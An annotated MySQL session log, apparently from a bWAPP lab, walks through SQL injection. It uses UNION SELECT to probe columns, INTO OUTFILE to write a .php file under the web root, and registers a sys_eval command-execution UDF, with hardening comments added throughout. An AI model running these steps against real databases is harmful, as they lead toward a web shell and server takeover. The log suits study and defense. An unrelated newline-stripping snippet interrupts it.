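-- Recorded mysql client session against the heroes table. The console output
-- is reflowed to one line per line; statements and messages are as recorded.

-- Baseline: no row has id = 7, so the plain lookup returns nothing.
mysql> select * from heroes where id = 7;
Empty set (0.00 sec)

-- A UNION SELECT of four constants returns a row even though the lookup
-- matched nothing. The result header shows that heroes has four columns
-- (id, login, password, secret), including a password column.
-- If the id value is ever built from request input, bind it as a parameter so
-- that it can never extend the statement with a trailing clause like this one.
mysql> select * from heroes where id = 7 union select 1,2,3,4;
+----+-------+----------+--------+
| id | login | password | secret |
+----+-------+----------+--------+
|  1 | 2     | 3        | 4      |
+----+-------+----------+--------+
1 row in set (0.00 sec)

-- INTO OUTFILE makes the server process write the result set to a path on the
-- database host. Both attempts fail:
--   * ERROR 1086: the first target is an existing path (the directory itself).
--   * Errcode 13 (permission denied): the account running mysqld cannot
--     create files in /var/www/html/.
-- The file-system permission is the only control that stopped the write here.
-- Hardening: set secure_file_priv to NULL or to a dedicated directory outside
-- any web-served path, and do not grant the FILE privilege to application
-- accounts.
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/';
ERROR 1086 (HY000): File '/var/www/html/' already exists
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/abc.txt';
ERROR 1 (HY000): Can't create/write to file '/var/www/html/abc.txt' (Errcode: 13)
mysql>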
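上面第二条报错中的 Errcode: 13 表示权限不足:运行 mysqld 的系统账号对 /var/www/html/ 没有写权限,因此需要找到一个该账号有写权限的文件夹。(防御角度:这里挡住写入的只有文件系统权限;Web 目录下不应存在数据库服务账号可写的目录,同时应设置 secure_file_priv,并避免向应用账号授予 FILE 权限。)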
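-- Second recorded session, in the bWAPP database. The console output is
-- reflowed to one line per line; statements and messages are as recorded.
mysql> use bWAPP;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
-- The INTO OUTFILE statement succeeds when the target is
-- /var/www/html/images/, a directory the mysqld account can write to
-- (presumably under the web root -- confirm against the web server config).
-- The file written here holds only the constants 1, 2, 3 and 'hello', but it
-- carries a .php name inside that directory.
-- Defensive takeaways:
--   * No directory under a web-served path should be writable by the
--     database service account.
--   * Directories for static content such as images should not be configured
--     to execute scripts.
--   * secure_file_priv and withholding the FILE privilege block the
--     statement itself, independent of directory permissions.
--   * Files created this way are owned by the MySQL service account, so
--     file-integrity monitoring on the web tree can flag them.
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/images/abc.php';
Query OK, 1 row affected (0.00 sec)

mysql>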
剔除回车
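# Delete every newline character from input.txt and write the result to
# output.txt. The argument must be wrapped in plain ASCII single quotes so
# that tr receives the two-character escape \n rather than a bare letter n.
tr -d '\n' < input.txt > output.txt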
成功写入。
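创建自定义函数(UDF)。注意:CREATE FUNCTION … SONAME 会让 mysqld 加载插件目录(plugin_dir)中的共享库,并在 mysql.func 表中留下记录;防御上应限制 plugin_dir 的写权限,并定期审计 mysql.func 中是否出现未知函数。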
-- Register a user-defined function (UDF) named sys_eval, declared to return a
-- string, whose implementation is taken from the shared library lib_linux1.so.
-- The server loads the named library into the mysqld process, so whatever the
-- function does runs with the privileges of the database service account.
-- The library itself is not shown on this page; the name sys_eval matches the
-- command-execution UDF of the lib_mysqludf_sys family, presumably the same.
-- Detection: registered UDFs are listed in mysql.func, so an unexpected row
-- there, or an unexpected shared object in plugin_dir, warrants investigation.
create function sys_eval
    returns string
    soname "lib_linux1.so";